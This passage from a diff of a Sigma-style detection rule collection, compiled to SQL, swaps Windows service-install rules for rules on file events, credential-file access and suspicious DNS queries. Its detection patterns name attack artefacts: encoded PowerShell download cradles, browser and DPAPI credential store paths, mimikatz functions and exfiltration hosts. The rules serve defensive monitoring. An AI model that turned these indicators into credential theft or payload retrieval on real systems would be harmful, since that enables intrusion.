'\\' AND ImagePath LIKE '%start%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\') OR ImagePath LIKE '%powershell -nop -w hidden -encodedcommand%' ESCAPE '\\' OR ImagePath LIKE '%SUVYIChOZXctT2JqZWN0IE5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTI3LjAuMC4xO%' ESCAPE '\\' OR ImagePath LIKE '%lFWCAoTmV3LU9iamVjdCBOZXQuV2ViY2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzEyNy4wLjAuMT%' ESCAPE '\\' OR ImagePath LIKE '%JRVggKE5ldy1PYmplY3QgTmV0LldlYmNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xMjcuMC4wLjE6%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\Notepad++\\\\plugins\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\Notepad++\\\\updater\\\\gup.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND (Image LIKE '%\\\\target.exe' ESCAPE '\\' OR Image LIKE '%Installer.x64.exe' ESCAPE '\\'))))" ], - "filename": "win_system_cobaltstrike_service_installs.yml" + "filename": "file_event_win_notepad_plus_plus_persistence.yml" }, { - "title": "RTCore Suspicious Service Installation", - "id": "91c49341-e2ef-40c0-ac45-49ec5c3fe26c", + "title": "Potential Startup Shortcut Persistence Via PowerShell.EXE", + "id": "92fa78e7-4d39-45f1-91a3-8b23f3f1088d", "status": "experimental", - "description": "Detects the installation of RTCore service. Which could be an indication of Micro-Star MSI Afterburner vulnerable driver abuse", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects PowerShell writing startup shortcuts.\nThis procedure was highlighted in Red Canary Intel Insights Oct. 2021, \"We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence.\nAccordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats.\nIn the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL\"\n", + "author": "Christopher Peacock '@securepeacock', SCYTHE", "tags": [ - "attack.persistence" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unknown" + "Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies inidicative of malware." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'RTCore64')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%\\\\start menu\\\\programs\\\\startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.lnk' ESCAPE '\\')" ], - "filename": "win_system_susp_rtcore64_service_install.yml" + "filename": "file_event_win_powershell_startup_shortcuts.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher - System", - "id": "f7385ee2-0e0c-11eb-adc1-0242ac120002", + "title": "Rename Common File to DLL File", + "id": "bbfd974c-248e-4435-8de6-1e938c79c5c1", "status": "experimental", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects cases in which a file gets renamed to .dll, which often happens to bypass perimeter protection", + "author": "frack113", + "falsepositives": [ + "Application installation" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (TargetFilename LIKE '%.dll' ESCAPE '\\' AND NOT (((SourceFilename LIKE '%.dll' ESCAPE '\\' OR SourceFilename LIKE '%.tmp' ESCAPE '\\') OR (SourceFilename LIKE '%.dll.%' ESCAPE '\\' OR SourceFilename LIKE '%\\\\SquirrelTemp\\\\temp%' ESCAPE '\\')) OR (SourceFilename = '') OR (SourceFilename = '') OR (Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\wuauclt.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" + ], + "filename": "file_rename_win_not_dll_to_dll.yml" + }, + { + "title": "Suspicious Appended Extension", + "id": "e3f673b3-65d1-4d80-9146-466f8b63fa99", + "status": "experimental", + "description": "Detects possible ransomware adding a custom extension to the encrypted files, such as \".jpg.crypted\", \".docx.locky\" etc.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.impact", + "attack.t1486" + ], + "falsepositives": [ + "Backup software" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (((SourceFilename LIKE '%.lnk' ESCAPE '\\' OR SourceFilename LIKE '%.rtf' ESCAPE '\\' OR SourceFilename LIKE '%.pst' ESCAPE '\\' OR SourceFilename LIKE '%.docx' ESCAPE '\\' OR SourceFilename LIKE '%.xlsx' ESCAPE '\\' OR SourceFilename LIKE '%.jpg' ESCAPE '\\' OR SourceFilename LIKE '%.jpeg' ESCAPE '\\' OR SourceFilename LIKE '%.png' ESCAPE '\\' OR SourceFilename LIKE '%.pdf' ESCAPE '\\') AND (TargetFilename LIKE '%.lnk.%' ESCAPE '\\' OR TargetFilename LIKE '%.rtf.%' ESCAPE '\\' OR TargetFilename LIKE '%.pst.%' ESCAPE '\\' OR TargetFilename LIKE '%.docx.%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpg.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpeg.%' ESCAPE '\\' OR TargetFilename LIKE '%.png.%' ESCAPE '\\' OR TargetFilename LIKE '%.pdf.%' ESCAPE '\\')) AND NOT (((TargetFilename LIKE '%.tmp' ESCAPE '\\' OR TargetFilename LIKE '%.bak' ESCAPE '\\' OR TargetFilename LIKE '%.old' ESCAPE '\\' OR TargetFilename LIKE '%.orig' ESCAPE '\\' OR TargetFilename LIKE '%.backup' ESCAPE '\\' OR TargetFilename LIKE '%.temp' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\ProgramData\\\\Anaconda3\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.c~' ESCAPE '\\')))" + ], + "filename": "file_rename_win_ransomware.yml" + }, + { + "title": "Unusual File Modification by dns.exe", + "id": "9f383dc0-fdeb-4d56-acbc-9f9f4f8f20f3", + "status": "experimental", + "description": "Detects an unexpected file being modified by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", + "author": "Tim Rauch (Nextron Systems)", + "tags": [ + "attack.initial_access", + "attack.t1133" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND ImagePath LIKE '%clipboard]::%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '2' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (TargetFilename LIKE '%\\\\dns.log' ESCAPE '\\'))" ], - "filename": "win_system_invoke_obfuscation_clip_services.yml" + "filename": "file_change_win_unusual_modification_by_dns_exe.yml" }, { - "title": "Suspicious Service Installation", - "id": "1d61f71d-59d2-479e-9562-4ff5f4ead16b", + "title": "File Creation Date Changed to Another Year", + "id": "558eebe5-f2ba-4104-b339-36f7902bcc1a", "status": "experimental", - "description": "Detects suspicious service installation commands", - "author": "pH-T (Nextron Systems)", + "description": "Attackers may change the file creation time of a backdoor to make it look like it was installed with the operating system.\nNote that many processes legitimately change the creation time of a file; it does not necessarily indicate malicious activity.\n", + "author": "frack113, Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "car.2013-09-005", - "attack.t1543.003" + "attack.t1070.006", + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Changes made to or by the local NTP service" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND ((Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '% -w hidden %' ESCAPE '\\' OR ImagePath LIKE '% -nop %' ESCAPE '\\' OR ImagePath LIKE '% -sta %' ESCAPE '\\' OR ImagePath LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\\\\\.\\\\pipe%' ESCAPE '\\' OR ImagePath LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR ImagePath LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR ImagePath LIKE '%.downloadstring(%' ESCAPE '\\' OR ImagePath LIKE '%.downloadfile(%' ESCAPE '\\') OR (ImagePath LIKE '% -e%' ESCAPE '\\' AND (ImagePath LIKE '% JAB%' ESCAPE '\\' OR ImagePath LIKE '% SUVYI%' ESCAPE '\\' OR ImagePath LIKE '% SQBFAFgA%' ESCAPE '\\' OR ImagePath LIKE '% aWV4I%' ESCAPE '\\' OR ImagePath LIKE '% IAB%' ESCAPE '\\' OR ImagePath LIKE '% PAA%' ESCAPE '\\' OR ImagePath LIKE '% aQBlAHgA%' ESCAPE '\\')))) AND NOT ((ImagePath LIKE 'C:\\\\WINDOWS\\\\TEMP\\\\thor10-remote\\\\thor64.exe%' ESCAPE '\\') OR (ImagePath LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '2' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((PreviousCreationUtcTime LIKE '2022%' ESCAPE '\\' AND NOT (CreationUtcTime LIKE '2022%' ESCAPE '\\')) OR (PreviousCreationUtcTime LIKE '202%' ESCAPE '\\' AND NOT (CreationUtcTime LIKE '202%' ESCAPE '\\'))) AND NOT (((Image LIKE 'C:\\\\Windows\\\\system32\\\\ProvTool.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\usocoreworker.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR TargetFilename LIKE 'C:\\\\ProgramData\\\\USOPrivate\\\\UpdateStore\\\\%' ESCAPE '\\' OR (TargetFilename LIKE '%.tmp' ESCAPE '\\' OR TargetFilename LIKE '%.temp' ESCAPE '\\')) OR (Image LIKE 'C:\\\\WINDOWS\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\' AND TargetFilename LIKE '%.cab' ESCAPE '\\')))" ], - "filename": "win_system_susp_service_installation.yml" + "filename": "file_change_win_2022_timestomping.yml" }, { - "title": "Tap Driver Installation", - "id": "8e4cf0e5-aa5d-4dc3-beff-dc26917744a9", - "status": "test", - "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques", - "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", + "title": "Suspicious Access To Browser Credential Files", + "id": "91cb43db-302a-47e3-b3c8-7ede481e27bf", + "status": "experimental", + "description": "Detects suspicious processes based on name and location that access the browser credential stores which can be the sign of credential stealing", + "author": "frack113", "tags": [ - "attack.exfiltration", - "attack.t1048" + "attack.t1003", + "attack.credential_access" ], "falsepositives": [ - "Legitimate OpenVPN TAP insntallation" + "Antivirus, Anti-Spyware, Anti-Malware Software", + "Backup software", + "Legitimate software installed on partitions other than \"C:\\\"", + "Searching software such as \"everything.exe\"" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%tap0901%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (((FileName LIKE '%\\\\Appdata\\\\Local\\\\Microsoft\\\\Windows\\\\WebCache\\\\WebCacheV01.dat' ESCAPE '\\' OR (FileName LIKE '%\\\\cookies.sqlite' ESCAPE '\\' OR FileName LIKE '%release\\\\key3.db' ESCAPE '\\' OR FileName LIKE '%release\\\\key4.db' ESCAPE '\\' OR FileName LIKE '%release\\\\logins.json' ESCAPE '\\') OR (FileName LIKE '%\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Network\\\\Cookies%' ESCAPE '\\' OR FileName LIKE '%\\\\Appdata\\\\Local\\\\Chrome\\\\User Data\\\\Default\\\\Login Data%' ESCAPE '\\' OR FileName LIKE '%\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data\\\\Local State%' ESCAPE '\\')) AND NOT ((Image = 'System' AND ParentImage = 'Idle') OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\WINDOWS\\\\SysWOW64\\\\%' ESCAPE '\\')))) AND NOT ((Image LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' AND (Image LIKE '%\\\\MpCopyAccelerator.exe' ESCAPE '\\' OR Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')) OR ((Image LIKE '%\\\\thor64.exe' ESCAPE '\\' OR Image LIKE '%\\\\thor.exe' ESCAPE '\\')) OR (ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\')))" ], - "filename": "win_system_tap_driver_installation.yml" + "filename": "file_access_win_browser_credential_stealing.yml" }, { - "title": "Important Windows Eventlog Cleared", - "id": "100ef69e-3327-481c-8e5c-6d80d9507556", + "title": "Suspicious Access To Windows DPAPI Master Keys", + "id": "46612ae6-86be-4802-bc07-39b59feb1309", "status": "experimental", - "description": "Detects the clearing of one of the Windows Core Eventlogs. e.g. caused by \"wevtutil cl\" command execution", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "description": "Detects suspicious processes based on name and location that access the Windows Data Protection API Master keys.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::masterkey\" function\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.001", - "car.2016-04-002" + "attack.credential_access", + "attack.t1555.004" ], "falsepositives": [ - "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", - "System provisioning (system reset before the golden image creation)" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '104' AND Provider_Name = 'Microsoft-Windows-Eventlog' AND Channel IN ('System', 'Security', 'Application'))" + "SELECT * FROM logs WHERE ((FileName LIKE '%\\\\Microsoft\\\\Protect\\\\S-1-5-18\\\\%' ESCAPE '\\' OR FileName LIKE '%\\\\Microsoft\\\\Protect\\\\S-1-5-21-%' ESCAPE '\\') AND NOT (((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\system32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\'))))" ], - "filename": "win_system_susp_eventlog_cleared.yml" + "filename": "file_access_win_dpapi_master_key_access.yml" }, { - "title": "Mesh Agent Service Installation", - "id": "e0d1ad53-c7eb-48ec-a87a-72393cc6cedc", + "title": "Credential Manager Access", + "id": "407aecb1-e762-4acf-8c7b-d087bcff3bb6", "status": "experimental", - "description": "Detects a Mesh Agent service installation. Mesh Agent is used to remotely manage computers", + "description": "Detects suspicious processes based on name and location that access the windows credential manager and vault.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::cred\" function\n", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.t1003", + "attack.credential_access" ], "falsepositives": [ - "Legitimate use of the tool" + "Legitimate software installed by the users for example in the \"AppData\" directory may access these files (for any reason)." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%MeshAgent.exe%' ESCAPE '\\' OR ServiceName LIKE '%Mesh Agent%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((FileName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Credentials\\\\%' ESCAPE '\\' OR FileName LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Credentials\\\\%' ESCAPE '\\' OR FileName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Vault\\\\%' ESCAPE '\\' OR FileName LIKE '%\\\\ProgramData\\\\Microsoft\\\\Vault\\\\%' ESCAPE '\\') AND NOT (((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\system32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\'))))" ], - "filename": "win_system_service_install_mesh_agent.yml" + "filename": "file_access_win_credential_manager_stealing.yml" }, { - "title": "Exploit SamAccountName Spoofing with Kerberos", - "id": "44bbff3e-4ca3-452d-a49a-6efa4cafa06f", - "status": "test", - "description": "The attacker creates a computer object using those permissions with a password known to her.\nAfter that she clears the attribute ServicePrincipalName on the computer object.\nBecause she created the object (CREATOR OWNER), she gets granted additional permissions and can do many changes to the object.\n", - "author": "frack113", + "title": "Suspicious Access To Windows Credential History File", + "id": "7a2a22ea-a203-4cd3-9abf-20eb1c5c6cd2", + "status": "experimental", + "description": "Detects suspicious processes based on name and location that access the Windows Credential History File.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::credhist\" function\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1558.003" + "attack.t1555.004" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND ((Provider_Name = 'Microsoft-Windows-Kerberos-Key-Distribution-Center' AND EventID IN ('35', '36', '37', '38')) OR (Provider_Name = 'Microsoft-Windows-Directory-Services-SAM' AND EventID IN ('16990', '16991'))))" + "SELECT * FROM logs WHERE (FileName LIKE '%\\\\Microsoft\\\\Protect\\\\CREDHIST' ESCAPE '\\' AND NOT (((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\system32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\')))" ], - "filename": "win_system_vul_cve_2021_42278_or_cve_2021_42287.yml" + "filename": "file_access_win_susp_cred_hist_access.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation - System", - "id": "51aa9387-1c53-4153-91cc-d73c59ae1ca9", - "status": "experimental", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "title": "AppX Package Installation Attempts Via AppInstaller", + "id": "7cff77e1-9663-46a3-8260-17f2e1aa9d0a", + "status": "test", + "description": "AppInstaller.exe is spawned by the default handler for the \"ms-appinstaller\" URI. It attempts to load/install a package from the referenced URL", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '7045' AND (ImagePath REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ImagePath REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ImagePath REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ImagePath REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ImagePath REGEXP '\\\\*mdr\\*\\W\\s*\\)\\.Name' OR ImagePath REGEXP '\\$VerbosePreference\\.ToString\\(' OR ImagePath REGEXP '\\String\\]\\s*\\$VerbosePreference'))" + "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller\\_%' ESCAPE '\\' AND Image LIKE '%\\\\AppInstaller.exe' ESCAPE '\\')" ], - "filename": "win_system_invoke_obfuscation_obfuscated_iex_services.yml" + "filename": "dns_query_win_lolbin_appinstaller.yml" }, { - "title": "QuarksPwDump Clearing Access History", - "id": "39f919f3-980b-4e6f-a975-8af7e507ef2b", - "status": "test", - "description": "Detects QuarksPwDump clearing access history in hive", - "author": "Florian Roth (Nextron Systems)", + "title": "DNS Query Tor Onion Address - Sysmon", + "id": "b55ca2a3-7cff-4dda-8bdd-c7bfa63bf544", + "status": "experimental", + "description": "Detects DNS queries to an \".onion\" address related to Tor routing networks", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.command_and_control", + "attack.t1090.003" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '16' AND Provider_Name = 'Microsoft-Windows-Kernel-General' AND HiveName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\SAM%' ESCAPE '\\' AND HiveName LIKE '%.dmp' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%.onion%' ESCAPE '\\')" ], - "filename": "win_system_quarkspwdump_clearing_hive_access_history.yml" + "filename": "dns_query_win_tor_onion.yml" }, { - "title": "Service Installation with Suspicious Folder Pattern", - "id": "1b2ae822-6fe1-43ba-aa7c-d1a3b3d1d5f2", + "title": "Regsvr32 Network Activity - DNS", + "id": "36e037c4-c228-4866-b6a3-48eb292b9955", "status": "test", - "description": "Detects service installation with suspicious folder patterns", - "author": "pH-T (Nextron Systems)", + "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", + "author": "Dmitriy Lifanov, oscd.community", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "car.2013-09-005", - "attack.t1543.003" + "attack.execution", + "attack.t1559.001", + "attack.defense_evasion", + "attack.t1218.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath REGEXP '^[Cc]:\\\\[Pp]rogram[Dd]ata\\\\.{1,9}\\.exe' OR ImagePath REGEXP '^[Cc]:\\\\.{1,9}\\.exe'))" + "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\')" ], - "filename": "win_system_susp_service_installation_folder_pattern.yml" + "filename": "dns_query_win_regsvr32_network_activity.yml" }, { - "title": "Invoke-Obfuscation Via Use Rundll32 - System", - "id": "641a4bfb-c017-44f7-800c-2aee0184ce9b", - "status": "experimental", - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "DNS Query for MEGA.io Upload Domain - Sysmon", + "id": "613c03ba-0779-4a53-8a1f-47f914a4ded3", + "status": "test", + "description": "Detects DNS queries for subdomains used for upload to MEGA.io", + "author": "Aaron Greetham (@beardofbinary) - NCC Group", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unknown" + "Legitimate DNS queries and usage of Mega" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND ImagePath LIKE '%rundll32%' ESCAPE '\\' AND ImagePath LIKE '%shell32.dll%' ESCAPE '\\' AND ImagePath LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ImagePath LIKE '%value%' ESCAPE '\\' OR ImagePath LIKE '%invoke%' ESCAPE '\\' OR ImagePath LIKE '%comspec%' ESCAPE '\\' OR ImagePath LIKE '%iex%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%userstorage.mega.co.nz%' ESCAPE '\\')" ], - "filename": "win_system_invoke_obfuscation_via_use_rundll32_services.yml" + "filename": "dns_query_win_mega_nz.yml" }, { - "title": "DHCP Server Error Failed Loading the CallOut DLL", - "id": "75edd3fd-7146-48e5-9848-3013d7f0282c", + "title": "DNS HybridConnectionManager Service Bus", + "id": "7bd3902d-8b8b-4dd4-838a-c6862d40150d", "status": "test", - "description": "This rule detects a DHCP server error in which a specified Callout DLL (in registry) could not be loaded", - "author": "Dimitrios Slamaris, @atc_project (fix)", + "description": "Detects Azure Hybrid Connection Manager services querying the Azure service bus service", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.persistence", + "attack.t1554" ], "falsepositives": [ - "Unknown" + "Legitimate use of Azure Hybrid Connection Manager and the Azure Service Bus service" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('1031', '1032', '1034') AND Provider_Name = 'Microsoft-Windows-DHCP-Server')" + "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%servicebus.windows.net%' ESCAPE '\\' AND Image LIKE '%HybridConnectionManager%' ESCAPE '\\')" ], - "filename": "win_system_susp_dhcp_config_failed.yml" + "filename": "dns_query_win_hybridconnectionmgr_servicebus.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher - System", - "id": "8ca7004b-e620-4ecb-870e-86129b5b8e75", + "title": "Potential SocGholish Second Stage C2 DNS Query", + "id": "70761fe8-6aa2-4f80-98c1-a57049c08e66", "status": "experimental", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects a DNS query initiated from a \"wscript\" process for domains matching a specific pattern that was seen being used by SocGholish for its Command and Control traffic", + "author": "Dusty Miller", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate domain names matching the regex pattern by chance (e.g. domain controllers dc01.company.co.uk)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%\"set%' ESCAPE '\\' AND ImagePath LIKE '%-f%' ESCAPE '\\' AND (ImagePath LIKE '%/c%' ESCAPE '\\' OR ImagePath LIKE '%/r%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wscript.exe' ESCAPE '\\' AND QueryName REGEXP '[a-f0-9]{4,8}\\.(?:[a-z0-9\\-]+\\.){2}[a-z0-9\\-]+')" ], - "filename": "win_system_invoke_obfuscation_var_services.yml" + "filename": "dns_query_win_malware_socgholish_second_stage_c2.yml" }, { - "title": "Service Installation in Suspicious Folder", - "id": "5e993621-67d4-488a-b9ae-b420d08b96cb", + "title": "DNS Query for Anonfiles.com Domain - Sysmon", + "id": "065cceea-77ec-4030-9052-fc0affea7110", "status": "experimental", - "description": "Detects service installation in suspicious folder appdata", + "description": "Detects DNS queries for \"anonfiles.com\", which is an anonymous file upload platform often used for malicious purposes", "author": "pH-T (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "car.2013-09-005", - "attack.t1543.003" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unknown" + "Rare legitimate access to anonfiles.com" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\\\\\127.0.0.1%' ESCAPE '\\' OR ImagePath LIKE '%\\\\\\\\localhost%' ESCAPE '\\')) AND NOT ((ServiceName = 'Zoom Sharing Service' AND ImagePath LIKE '\"C:\\\\Program 